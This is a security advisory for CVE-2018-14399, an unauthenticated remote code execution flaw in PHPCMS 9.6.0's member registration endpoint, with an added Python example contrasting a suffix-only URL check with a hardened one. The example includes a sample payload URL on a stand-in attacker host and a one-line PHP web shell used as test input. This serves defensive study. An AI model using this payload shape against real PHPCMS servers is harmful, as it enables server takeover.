PT-2018-12490 · Phpcms · Phpcms

Published: 2018-07-19 · Updated: 2024-02-14 · CVE-2018-14399

CVSS v3.1: 9.8 (Critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: PHPCMS version 9.6.0

Description: A remote, unauthenticated attacker can upload and execute arbitrary PHP code on the server. The attack is carried out by submitting info[content] JSON data to the index.php?m=member&c=index&a=register endpoint in which an IMG element's SRC attribute holds a URI of the form .txt?.php#.jpg. The query string and fragment let the URI end in an image extension (.jpg) while still carrying a .php suffix, so a check that only looks at how the string ends accepts it and the remote file referenced by the tag ends up stored and executed as PHP.

Recommendations: For PHPCMS version 9.6.0, restrict access to the index.php?m=member&c=index&a=register endpoint (for example at the web server or WAF layer) to minimize the risk of exploitation; note that this also blocks legitimate member registration while it is in place. Until the issue is resolved, do not accept info[content] JSON data on this endpoint, or at least strip HTML, and in particular IMG elements with remote SRC values, from it. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
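The following is an added example, not PHPCMS code and not the project's actual image-handling logic. It shows why a check that only inspects the end of the submitted URI string accepts the .txt?.php#.jpg form from the description, and what a hardened check looks like: decide the extension from the URL path only (query and fragment dropped), allowlist the extension, never derive the stored filename from attacker-controlled text, and confirm the fetched bytes start with the magic of the claimed image type. The hostnames, the audit_content helper and the sample info[content] value are constructed for illustration.

```python
"""Added example (not PHPCMS code): suffix-only URI check beside a hardened one."""
import os
import re
from urllib.parse import urlsplit

ALLOWED_IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes of the image formats we allow, taken from the public format specs.
IMAGE_MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}

# Minimal extractor for the SRC attribute of IMG elements in submitted HTML.
IMG_SRC_RE = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def extract_img_srcs(html: str) -> list[str]:
    """Return every IMG SRC value found in the content, in document order."""
    return IMG_SRC_RE.findall(html)


def weak_is_image_url(url: str) -> bool:
    """Suffix check on the whole string: '#.jpg' at the end is enough to pass it."""
    return url.lower().endswith(tuple(ALLOWED_IMAGE_EXTS))


def effective_extension(url: str) -> str:
    """Extension of the URL *path* only; query ('?.php') and fragment ('#.jpg') are ignored."""
    path = urlsplit(url).path
    return os.path.splitext(path)[1].lower()


def hardened_is_image_url(url: str) -> bool:
    """Accept only http(s) URLs whose path extension is on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    return effective_extension(url) in ALLOWED_IMAGE_EXTS


def safe_local_name(url: str, random_token: str) -> str:
    """Server-chosen filename: a random token plus the allowlisted extension, never URL text.

    random_token is assumed to come from the caller (e.g. secrets.token_hex()).
    """
    ext = effective_extension(url)
    if ext not in ALLOWED_IMAGE_EXTS:
        raise ValueError("not an allowed image extension")
    return f"{random_token}{ext}"


def looks_like_image(data: bytes, ext: str) -> bool:
    """Second gate after download: the bytes must start with the magic of the claimed type."""
    magic = IMAGE_MAGIC.get(ext)
    return magic is not None and data.startswith(magic)


def audit_content(html: str) -> dict[str, tuple[bool, bool]]:
    """Map each IMG SRC in the content to (suffix-check verdict, hardened verdict)."""
    return {u: (weak_is_image_url(u), hardened_is_image_url(u)) for u in extract_img_srcs(html)}


if __name__ == "__main__":
    # Constructed sample of an info[content] value shaped like the one in the advisory.
    sample = (
        '<p>hello</p>'
        '<img src="http://attacker.example/shell.txt?.php#.jpg">'
        '<img src="https://cdn.example/logo.png">'
    )
    for url, (weak, hard) in audit_content(sample).items():
        print(f"{url}\n  suffix check: {'accept' if weak else 'reject'}"
              f"\n  hardened:     {'accept' if hard else 'reject'}")
    # A fetched body that is really PHP fails the magic-byte gate even with a .jpg extension.
    print("php body as .jpg:", looks_like_image(b"<?php system($_GET['c']); ?>", ".jpg"))
```

Running the block prints that the suffix check accepts the .txt?.php#.jpg URI while the hardened check rejects it (its path extension is .txt), and that a PHP body is refused by the magic-byte gate. The two gates are complementary: the URL check stops the request before any fetch, and the content check catches a host that serves PHP under an image-looking path.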

Weakness Enumeration: Code Injection

Related Identifiers: CVE-2018-14399

Affected Products: Phpcms